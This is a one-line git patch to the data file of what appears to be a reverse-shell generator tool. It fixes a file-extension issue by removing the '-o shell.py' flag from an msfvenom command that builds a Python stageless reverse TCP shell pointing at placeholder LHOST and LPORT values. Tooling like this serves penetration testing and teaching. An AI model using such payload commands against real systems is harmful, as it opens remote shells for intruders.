From 7b86264ecdc835a1f65d699525a34cdcb6a35af4 Mon Sep 17 00:00:00 2001 From: Alvin Smith Date: Tue, 11 Oct 2022 13:01:00 +1300 Subject: [PATCH] Update data.js Fix the Python Stageless Reverse TCP output file extension error https://github.com/0dayCTF/reverse-shell-generator/issues/96 --- js/data.js | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/js/data.js b/js/data.js index 817c7ff..a9cbe52 100644 --- a/js/data.js +++ b/js/data.js @@ -440,7 +440,7 @@ const msfvenomCommands = withCommandType( }, { "name": "Python Stageless Reverse TCP", - "command": "msfvenom -p cmd/unix/reverse_python LHOST={ip} LPORT={port} -f raw -o shell.py", + "command": "msfvenom -p cmd/unix/reverse_python LHOST={ip} LPORT={port} -f raw", "meta": ["msfvenom", "windows", "linux", "stageless", "reverse"] }, {